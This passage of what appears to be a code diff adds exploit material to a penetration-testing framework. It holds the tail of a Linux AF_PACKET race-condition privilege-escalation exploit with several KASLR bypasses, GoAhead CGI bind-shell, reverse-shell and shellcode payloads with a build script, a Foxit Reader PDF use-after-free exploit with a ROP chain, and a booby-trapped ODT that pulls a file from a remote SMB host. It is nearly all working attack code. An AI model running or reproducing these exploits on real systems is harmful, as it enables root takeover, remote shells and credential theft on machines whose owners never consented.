+    if (pid == 0) {
+        try_exploit(func, arg, verification_func);
+        exit(1);
+    }
+
+    wait(&status);
+
+    dprintf("\n");
+
+    if (WEXITSTATUS(status) == 2) {
+        dprintf("[.] retrying stage...\n");
+        kill(pid, 9);
+        sleep(2);
+        goto retry;
+    }
+
+    if (WEXITSTATUS(status) != 0) {
+        dprintf("[-] something bad happened, aborting exploit attempt\n");
+        exit(EXIT_FAILURE);
+    }
+
+    kill(pid, 9);
+}
+
+
+void wrapper(void)
+{
+    struct ctl_table *c;
+
+    dprintf("[.] making vsyscall page writable...\n\n");
+
+    exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);
+
+    dprintf("[~] done, stage 1 completed\n");
+
+    sleep(5);
+
+    dprintf("[.] registering new sysctl...\n\n");
+
+    c = (struct ctl_table *)(VSYSCALL+0x850);
+
+    memset((char *)(VSYSCALL+0x850), '\x00', 1952);
+
+    strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);
+    memcpy((char *)(VSYSCALL+0xe00), "\x01\x00\x00\x00",4);
+    c->procname = (char *)(VSYSCALL+0xf00);
+    c->mode = 0666;
+    c->proc_handler = (void *)(PROC_DOSTRING);
+    c->data = (void *)(MODPROBE_PATH);
+    c->maxlen = 256;
+    c->extra1 = (void *)(VSYSCALL+0xe00);
+    c->extra2 = (void *)(VSYSCALL+0xd00);
+
+    exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);
+
+    dprintf("[~] done, stage 2 completed\n");
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+void check_procs() {
+    int min_procs = 2;
+
+    int nprocs = 0;
+    nprocs = get_nprocs_conf();
+
+    if (nprocs < min_procs) {
+        dprintf("[-] system has less than %d processor cores\n", min_procs);
+        exit(EXIT_FAILURE);
+    }
+
+    dprintf("[.] system has %d processor cores\n", nprocs);
+}
+
+struct utsname get_kernel_version() {
+    struct utsname u;
+    int rv = uname(&u);
+    if (rv != 0) {
+        dprintf("[-] uname())\n");
+        exit(EXIT_FAILURE);
+    }
+    return u;
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+void detect_versions() {
+    struct utsname u;
+    char kernel_version[512];
+
+    u = get_kernel_version();
+
+    if (strstr(u.machine, "64") == NULL) {
+        dprintf("[-] system is not using a 64-bit kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (strstr(u.version, "-Ubuntu") == NULL) {
+        dprintf("[-] system is not using an Ubuntu kernel\n");
+        exit(EXIT_FAILURE);
+    }
+
+    char *u_ver = strtok(u.version, " ");
+    snprintf(kernel_version, 512, "%s %s", u.release, u_ver);
+
+    int i;
+    for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+        if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {
+            dprintf("[.] kernel version '%s' detected\n", kernels[i].kernel_version);
+            kernel = i;
+            return;
+        }
+    }
+
+    dprintf("[-] kernel version not recognized\n");
+    exit(EXIT_FAILURE);
+}
+
+// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+bool mmap_syslog(char** buffer, int* size) {
+    *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+        return false;
+    }
+
+    *size = (*size / getpagesize() + 1) * getpagesize();
+    *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,
+                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+
+    *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);
+    if (*size == -1) {
+        dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+        return false;
+    }
+
+    return true;
+}
+
+unsigned long get_kernel_addr_trusty(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) return 0;
+
+    int start = 0;
+    int end = 0;
+    for (end = start; substr[end] != '-'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) return 0;
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xffffffffff000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_xenial(char* buffer, int size) {
+    const char* needle1 = "Freeing unused";
+    char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    int start = 0;
+    int end = 0;
+    for (start = 0; substr[start] != '-'; start++);
+    for (end = start; substr[end] != '\n'; end++);
+
+    const char* needle2 = "ffffff";
+    substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));
+    if (substr == NULL) {
+        return 0;
+    }
+
+    char* endptr = &substr[16];
+    unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+    r &= 0xfffffffffff00000ul;
+    r -= 0x1000000ul;
+
+    return r;
+}
+
+unsigned long get_kernel_addr_syslog() {
+    unsigned long addr = 0;
+    char* syslog;
+    int size;
+
+    dprintf("[.] trying syslog...\n");
+
+    if (!mmap_syslog(&syslog, &size))
+        return 0;
+
+    if (strstr(kernels[kernel].kernel_version, "14.04.1") != NULL)
+        addr = get_kernel_addr_trusty(syslog, size);
+    else
+        addr = get_kernel_addr_xenial(syslog, size);
+
+    if (!addr)
+        dprintf("[-] kernel base not found in syslog\n");
+
+    return addr;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+    FILE *f;
+    unsigned long addr = 0;
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    char* path = "/proc/kallsyms";
+
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+    FILE *f;
+    unsigned long addr = 0;
+    char path[512] = "/boot/System.map-";
+    char version[32];
+
+    struct utsname u;
+    u = get_kernel_version();
+    strcat(path, u.release);
+    dprintf("[.] trying %s...\n", path);
+    f = fopen(path, "r");
+    if (f == NULL) {
+        dprintf("[-] open/read(%s)\n", path);
+        return 0;
+    }
+
+    char dummy;
+    char sname[256];
+    char* name = "startup_64";
+    int ret = 0;
+    while (ret != EOF) {
+        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+        if (ret == 0) {
+            fscanf(f, "%s\n", sname);
+            continue;
+        }
+        if (!strcmp(name, sname)) {
+            fclose(f);
+            return addr;
+        }
+    }
+
+    fclose(f);
+    dprintf("[-] kernel base not found in %s\n", path);
+    return 0;
+}
+
+// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_mincore() {
+    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned long iterations = 20000000;
+    unsigned long addr = 0;
+
+    dprintf("[.] trying mincore info leak...\n");
+    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
+    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
+        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap()\n");
+        return 0;
+    }
+
+    int i;
+    for (i = 0; i <= iterations; i++) {
+        /* Touch a mishandle with this type mapping */
+        if (mincore((void*)0x86000000, 0x1000000, buf)) {
+            dprintf("[-] mincore()\n");
+            return 0;
+        }
+
+        int n;
+        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+            addr = *(unsigned long*)(&buf[n]);
+            /* Kernel address space */
+            if (addr > 0xffffffff00000000) {
+                addr &= 0xffffffffff000000ul;
+                if (munmap((void*)0x66000000, 0x20000000000))
+                    dprintf("[-] munmap()\n");
+                return addr;
+            }
+        }
+    }
+
+    if (munmap((void*)0x66000000, 0x20000000000))
+        dprintf("[-] munmap()\n");
+
+    dprintf("[-] kernel base not found in mincore info leak\n");
+    return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+    unsigned long addr = 0;
+
+    addr = get_kernel_addr_kallsyms();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_sysmap();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_syslog();
+    if (addr) return addr;
+
+    addr = get_kernel_addr_mincore();
+    if (addr) return addr;
+
+    dprintf("[-] KASLR bypass failed\n");
+    exit(EXIT_FAILURE);
+
+    return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void launch_rootshell(void)
+{
+    int fd;
+    char buf[256];
+    struct stat s;
+
+    fd = open(SYSCTL_PATH, O_WRONLY);
+
+    if(fd == -1) {
+        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        exit(EXIT_FAILURE);
+    }
+
+    memset(buf, '\x00', 256);
+
+    readlink("/proc/self/exe", (char *)&buf, 256);
+
+    write(fd, buf, strlen(buf)+1);
+
+    socket(AF_INET, SOCK_STREAM, 132);
+
+    if (stat(buf,&s) == 0 && s.st_uid == 0) {
+        dprintf("[+] binary executed by kernel, launching rootshell\n");
+        lseek(fd, 0, SEEK_SET);
+        write(fd, "/sbin/modprobe", 15);
+        close(fd);
+        execl(buf, buf, NULL);
+    } else {
+        dprintf("[-] could not create rootshell\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+void setup_sandbox() {
+    if (unshare(CLONE_NEWUSER) != 0) {
+        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        exit(EXIT_FAILURE);
+    }
+
+    if (unshare(CLONE_NEWNET) != 0) {
+        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        exit(EXIT_FAILURE);
+    }
+}
+
+int main(int argc, char **argv)
+{
+    int status, pid;
+    struct utsname u;
+    char buf[512], *f;
+
+    if (getuid() == 0 && geteuid() == 0) {
+        chown("/proc/self/exe", 0, 0);
+        chmod("/proc/self/exe", 06755);
+        exit(0);
+    }
+
+    if (getuid() != 0 && geteuid() == 0) {
+        setresuid(0, 0, 0);
+        setresgid(0, 0, 0);
+        execl("/bin/bash", "bash", "-p", NULL);
+        exit(0);
+    }
+
+    dprintf("linux AF_PACKET race condition exploit by rebel\n");
+
+    dprintf("[.] starting\n");
+
+    dprintf("[.] checking hardware\n");
+    check_procs();
+    dprintf("[~] done, hardware looks good\n");
+
+    dprintf("[.] checking kernel version\n");
+    detect_versions();
+    dprintf("[~] done, version looks good\n");
+
+#if ENABLE_KASLR_BYPASS
+    dprintf("[.] KASLR bypass enabled, getting kernel base address\n");
+    KERNEL_BASE = get_kernel_addr();
+    dprintf("[~] done, kernel text:     %lx\n", KERNEL_BASE);
+#endif
+
+    dprintf("[.] proc_dostring:         %lx\n", PROC_DOSTRING);
+    dprintf("[.] modprobe_path:         %lx\n", MODPROBE_PATH);
+    dprintf("[.] register_sysctl_table: %lx\n", REGISTER_SYSCTL_TABLE);
+    dprintf("[.] set_memory_rw:         %lx\n", SET_MEMORY_RW);
+
+    pid = fork();
+    if (pid == 0) {
+        dprintf("[.] setting up namespace sandbox\n");
+        setup_sandbox();
+        dprintf("[~] done, namespace sandbox set up\n");
+        wrapper();
+        exit(0);
+    }
+
+    waitpid(pid, &status, 0);
+
+    launch_rootshell();
+    return 0;
+}

data/exploits/CVE-2017-17562/build.sh

@@ -0,0 +1,48 @@
+#!/bin/bash
+
+build () {
+  CC=$1
+  TARGET_SUFFIX=$2
+  CFLAGS=$3
+
+  echo "[*] Building for ${TARGET_SUFFIX}..."
+  for type in {shellcode,system,reverse,bind}
+   do ${CC} ${CFLAGS} -Wall -fPIC -fno-stack-protector -Os goahead-cgi-${type}.c -s -shared -o goahead-cgi-${type}-${TARGET_SUFFIX}.so
+  done
+}
+
+rm -f *.o *.so *.gz
+
+#
+# Linux GLIBC
+#
+
+# x86
+build "gcc" "linux-glibc-x86_64" "-m64 -D OLD_LIB_SET_2"
+build "gcc" "linux-glibc-x86" "-m32 -D OLD_LIB_SET_1"
+
+# ARM
+build "arm-linux-gnueabi-gcc-5" "linux-glibc-armel" "-march=armv5 -mlittle-endian"
+build "arm-linux-gnueabihf-gcc-5" "linux-glibc-armhf" "-march=armv7 -mlittle-endian"
+build "aarch64-linux-gnu-gcc-4.9" "linux-glibc-aarch64" ""
+
+# MIPS
+build "mips-linux-gnu-gcc-5" "linux-glibc-mips" "-D OLD_LIB_SET_1"
+build "mipsel-linux-gnu-gcc-5"  "linux-glibc-mipsel" "-D OLD_LIB_SET_1"
+build "mips64-linux-gnuabi64-gcc-5"  "linux-glibc-mips64" "-D OLD_LIB_SET_1"
+build "mips64el-linux-gnuabi64-gcc-5" "linux-glibc-mips64el" "-D OLD_LIB_SET_1"
+
+# SPARC
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc64" ""
+build "sparc64-linux-gnu-gcc-5" "linux-glibc-sparc" "-m32 -D OLD_LIB_SET_1"
+
+# PowerPC
+build "powerpc-linux-gnu-gcc-5" "linux-glibc-powerpc" "-D OLD_LIB_SET_1"
+build "powerpc64-linux-gnu-gcc-5" "linux-glibc-powerpc64" ""
+build "powerpc64le-linux-gnu-gcc-4.9" "linux-glibc-powerpc64le" ""
+
+# S390X
+build "s390x-linux-gnu-gcc-5" "linux-glibc-s390x" ""
+
+gzip -9 *.so
+rm -f *.o *.so

data/exploits/CVE-2017-17562/goahead-cgi-bind.c

@@ -0,0 +1,96 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _bind_tcp_shell(void) {
+
+  int sfd, fd, i;
+  struct sockaddr_in addr,saddr;
+  unsigned int saddr_len = sizeof(struct sockaddr_in);
+
+  char *lport = "55555";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  sfd = socket(AF_INET, SOCK_STREAM, 0);
+  setsockopt(sfd, SOL_SOCKET, SO_REUSEADDR, &(int){ 1 }, sizeof(int));
+
+  saddr.sin_family = AF_INET;
+  saddr.sin_port = htons(atoi(lport));
+  saddr.sin_addr.s_addr = INADDR_ANY;
+  bzero(&saddr.sin_zero, 8);
+
+  if (bind(sfd, (struct sockaddr *) &saddr, saddr_len) == -1) {
+    exit(1);
+  }
+
+  if (listen(sfd, 5) == -1) {
+    close(sfd);
+    exit(1);
+  }
+
+  fd = accept(sfd, (struct sockaddr *) &addr, &saddr_len);
+  close(sfd);
+
+  if (fd == -1) {
+    exit(1);
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _bind_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-reverse.c

@@ -0,0 +1,84 @@
+#include <arpa/inet.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+static void _reverse_tcp_shell(void) {
+
+  int fd, i;
+  struct sockaddr_in addr;
+  char *lport = "55555";
+  char *lhost = "000.000.000.000";
+  char *shells[] = {
+    "/bin/bash",
+    "/usr/bin/bash",
+    "/bin/sh",
+    "/usr/bin/sh",
+    "/bin/ash",
+    "/usr/bin/ash",
+    "/bin/dash",
+    "/usr/bin/dash",
+    "/bin/csh",
+    "/usr/bin/csh",
+    "/bin/ksh",
+    "/usr/bin/ksh",
+    "/bin/busybox",
+    "/usr/bin/busybox",
+    NULL
+  };
+
+  fd = socket(PF_INET, SOCK_STREAM, 0);
+  addr.sin_port = htons(atoi(lport));
+  addr.sin_addr.s_addr = inet_addr(lhost);
+  addr.sin_family = AF_INET;
+
+  memset(addr.sin_zero, 0, sizeof(addr.sin_zero));
+
+  for (i=0; i<10; i++) {
+    if (! connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr))) {
+      break;
+    }
+  }
+
+  for (i=0; i<3; i++) {
+    dup2(fd, i);
+  }
+
+  /* Keep trying until execl() succeeds */
+  for (i=0; ; i++) {
+    if (shells[i] == NULL) break;
+    execl(shells[i], "sh", NULL);
+  }
+
+  /* Close the connection if we failed to find a shell */
+  close(fd);
+}
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      _reverse_tcp_shell();
+
+    exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-shellcode.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <signal.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver mmap,mmap@GLIBC_2.0");
+__asm__(".symver memcpy,memcpy@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver mmap,mmap@GLIBC_2.2.5");
+__asm__(".symver memcpy,memcpy@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+  void *mem;
+  void (*fn)();
+
+  unsetenv("LD_PRELOAD");
+
+  mem = mmap(NULL, PAYLOAD_SIZE, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE, 0, 0);
+  if (mem == MAP_FAILED)
+    return;
+
+  memcpy(mem, payload, PAYLOAD_SIZE);
+  fn = (void(*)())mem;
+
+  if (! fork())
+    fn();
+
+  exit(0);
+}

data/exploits/CVE-2017-17562/goahead-cgi-system.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <unistd.h>
+#include <sys/mman.h>
+#include <string.h>
+#include <stdlib.h>
+
+#ifdef OLD_LIB_SET_1
+__asm__(".symver system,system@GLIBC_2.0");
+__asm__(".symver fork,fork@GLIBC_2.0");
+#endif
+
+#ifdef OLD_LIB_SET_2
+__asm__(".symver system,system@GLIBC_2.2.5");
+__asm__(".symver fork,fork@GLIBC_2.2.5");
+#endif
+
+#define PAYLOAD_SIZE 5000
+unsigned char payload[PAYLOAD_SIZE] = {'P','A','Y','L','O','A','D',0};
+
+static void _run_payload_(void) __attribute__((constructor));
+
+static void _run_payload_(void)
+{
+    int dummy = 0;
+    unsetenv("LD_PRELOAD");
+    if (! fork())
+      dummy = system((const char*)payload);
+
+    exit(dummy);
+}

data/exploits/CVE-2017-17562/install-deps.sh

@@ -0,0 +1,21 @@
+#!/bin/bash
+
+# Assume x86_64 Ubuntu 16.04 base system
+apt-get install build-essential \
+  gcc-5-multilib \
+  gcc-5-multilib-arm-linux-gnueabi \
+  gcc-5-multilib-arm-linux-gnueabihf \
+  gcc-5-multilib-mips-linux-gnu \
+  gcc-5-multilib-mips64-linux-gnuabi64 \
+  gcc-5-multilib-mips64el-linux-gnuabi64 \
+  gcc-5-multilib-mipsel-linux-gnu \
+  gcc-5-multilib-powerpc-linux-gnu \
+  gcc-5-multilib-powerpc64-linux-gnu \
+  gcc-5-multilib-s390x-linux-gnu \
+  gcc-5-multilib-sparc64-linux-gnu \
+  gcc-4.9-powerpc64le-linux-gnu \
+  gcc-4.9-aarch64-linux-gnu
+
+if [ ! -e /usr/include/asm ];
+  then ln -sf /usr/include/asm-generic /usr/include/asm
+fi

data/exploits/CVE-2018-9948/template.pdf

@@ -0,0 +1,125 @@
+%PDF
+1 0 obj
+<</Pages 1 0 R /OpenAction 2 0 R>>
+2 0 obj
+<</S /JavaScript /JS (
+
+var heap_ptr   = 0;
+var foxit_base = 0;
+var pwn_array  = [];
+
+function prepare_heap(size){
+    var arr = new Array(size);
+    for(var i = 0; i < size; i++){
+        arr[i] = this.addAnnot({type: "Text"});;
+        if (typeof arr[i] == "object"){
+            arr[i].destroy();
+        }
+    }
+}
+
+function gc() {
+    const maxMallocBytes = 128 * 0x100000;
+    for (var i = 0; i < 3; i++) {
+        var x = new ArrayBuffer(maxMallocBytes);
+    }
+}
+
+function alloc_at_leak(){
+    for (var i = 0; i < 0x64; i++){
+        pwn_array[i] = new Int32Array(new ArrayBuffer(0x40));
+    }
+}
+
+function control_memory(){
+    for (var i = 0; i < 0x64; i++){
+        for (var j = 0; j < pwn_array[i].length; j++){
+            pwn_array[i][j] = foxit_base + 0x01a7ee23; // push ecx; pop esp; pop ebp; ret 4
+        }
+    }
+}
+
+function leak_vtable(){
+    var a = this.addAnnot({type: "Text"});
+
+    a.destroy();
+    gc();
+
+    prepare_heap(0x400);
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    var leaked = stolen[0] & 0xffff0000;
+    foxit_base = leaked - 0x01f50000;
+}
+
+function leak_heap_chunk(){
+    var a = this.addAnnot({type: "Text"});
+    a.destroy();
+    prepare_heap(0x400);
+
+    var test = new ArrayBuffer(0x60);
+    var stolen = new Int32Array(test);
+
+    alloc_at_leak();
+    heap_ptr = stolen[1];
+}
+
+function reclaim(){
+    var arr = new Array(0x10);
+    for (var i = 0; i < arr.length; i++) {
+        arr[i] = new ArrayBuffer(0x60);
+        var rop = new Int32Array(arr[i]);
+
+        rop[0x00] = heap_ptr;                // pointer to our stack pivot from the TypedArray leak
+        rop[0x01] = foxit_base + 0x01a11d09; // xor ebx,ebx; or [eax],eax; ret
+        rop[0x02] = 0x72727272;              // junk
+        rop[0x03] = foxit_base + 0x00001450  // pop ebp; ret
+        rop[0x04] = 0xffffffff;              // ret of WinExec
+        rop[0x05] = foxit_base + 0x0069a802; // pop eax; ret
+        rop[0x06] = foxit_base + 0x01f2257c; // IAT WinExec
+        rop[0x07] = foxit_base + 0x0000c6c0; // mov eax,[eax]; ret
+        rop[0x08] = foxit_base + 0x00049d4e; // xchg esi,eax; ret
+        rop[0x09] = foxit_base + 0x00025cd6; // pop edi; ret
+        rop[0x0a] = foxit_base + 0x0041c6ca; // ret
+        rop[0x0b] = foxit_base + 0x000254fc; // pushad; ret
+        <%= rop %>
+        rop[0x17] = 0x00000000;              // adios, amigo
+    }
+}
+
+function trigger_uaf(){
+    var that = this;
+    var a = this.addAnnot({type:"Text", page: 0, name:"uaf"});
+    var arr = [1];
+    Object.defineProperties(arr,{
+        "0":{
+            get: function () {
+
+                that.getAnnot(0, "uaf").destroy();
+
+                reclaim();
+                return 1;
+            }
+        }
+    });
+
+    a.point = arr;
+}
+
+function main(){
+    leak_heap_chunk();
+    leak_vtable();
+    control_memory();
+    trigger_uaf();
+}
+
+if (app.platform == "WIN"){
+    if (app.isFoxit == "Foxit Reader"){
+        if (app.appFoxitVersion == "9.0.1.1049"){
+            main();
+        }
+    }
+}
+
+)>> trailer <</Root 1 0 R>>

data/exploits/badodt/content.xml

@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<office:document-content xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" xmlns:text="urn:oasis:names:tc:opendocument:xmlns:text:1.0" xmlns:table="urn:oasis:names:tc:opendocument:xmlns:table:1.0" xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" xmlns:fo="urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:meta="urn:oasis:names:tc:opendocument:xmlns:meta:1.0" xmlns:number="urn:oasis:names:tc:opendocument:xmlns:datastyle:1.0" xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" xmlns:chart="urn:oasis:names:tc:opendocument:xmlns:chart:1.0" xmlns:dr3d="urn:oasis:names:tc:opendocument:xmlns:dr3d:1.0" xmlns:math="http://www.w3.org/1998/Math/MathML" xmlns:form="urn:oasis:names:tc:opendocument:xmlns:form:1.0" xmlns:script="urn:oasis:names:tc:opendocument:xmlns:script:1.0" xmlns:ooo="http://openoffice.org/2004/office" xmlns:ooow="http://openoffice.org/2004/writer" xmlns:oooc="http://openoffice.org/2004/calc" xmlns:dom="http://www.w3.org/2001/xml-events" xmlns:xforms="http://www.w3.org/2002/xforms" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:rpt="http://openoffice.org/2005/report" xmlns:of="urn:oasis:names:tc:opendocument:xmlns:of:1.2" xmlns:xhtml="http://www.w3.org/1999/xhtml" xmlns:grddl="http://www.w3.org/2003/g/data-view#" xmlns:officeooo="http://openoffice.org/2009/office" xmlns:tableooo="http://openoffice.org/2009/table" xmlns:drawooo="http://openoffice.org/2010/draw" xmlns:calcext="urn:org:documentfoundation:names:experimental:calc:xmlns:calcext:1.0" xmlns:loext="urn:org:documentfoundation:names:experimental:office:xmlns:loext:1.0" xmlns:field="urn:openoffice:names:experimental:ooo-ms-interop:xmlns:field:1.0" xmlns:formx="urn:openoffice:names:experimental:ooxml-odf-interop:xmlns:form:1.0" xmlns:css3t="http://www.w3.org/TR/css3-text/" office:version="1.2"><office:scripts/><office:font-face-decls><style:font-face style:name="Lucida Sans1" svg:font-family="&apos;Lucida Sans&apos;" style:font-family-generic="swiss"/><style:font-face style:name="Liberation Serif" svg:font-family="&apos;Liberation Serif&apos;" style:font-family-generic="roman" style:font-pitch="variable"/><style:font-face style:name="Liberation Sans" svg:font-family="&apos;Liberation Sans&apos;" style:font-family-generic="swiss" style:font-pitch="variable"/><style:font-face style:name="Lucida Sans" svg:font-family="&apos;Lucida Sans&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="Microsoft YaHei" svg:font-family="&apos;Microsoft YaHei&apos;" style:font-family-generic="system" style:font-pitch="variable"/><style:font-face style:name="SimSun" svg:font-family="SimSun" style:font-family-generic="system" style:font-pitch="variable"/></office:font-face-decls><office:automatic-styles><style:style style:name="fr1" style:family="graphic" style:parent-style-name="OLE"><style:graphic-properties style:horizontal-pos="center" style:horizontal-rel="paragraph" draw:ole-draw-aspect="1"/></style:style></office:automatic-styles><office:body><office:text><text:sequence-decls><text:sequence-decl text:display-outline-level="0" text:name="Illustration"/><text:sequence-decl text:display-outline-level="0" text:name="Table"/><text:sequence-decl text:display-outline-level="0" text:name="Text"/><text:sequence-decl text:display-outline-level="0" text:name="Drawing"/></text:sequence-decls><text:p text:style-name="Standard"/><text:p text:style-name="Standard"><draw:frame draw:style-name="fr1" draw:name="Object1" text:anchor-type="paragraph" svg:width="14.101cm" svg:height="9.999cm" draw:z-index="0"><draw:object xlink:href="file://192.168.1.25/test.jpg" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/><draw:image xlink:href="./ObjectReplacements/Object 1" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/></draw:frame></text:p></office:text></office:body></office:document-content>

data/exploits/badodt/manifest.rdf

@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8"?>
+<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
+  <rdf:Description rdf:about="styles.xml">
+    <rdf:type rdf:resource="http://docs.oasis-open.org/ns/office/1.2/meta/odf#StylesFile"/>
+  </rdf:Description>
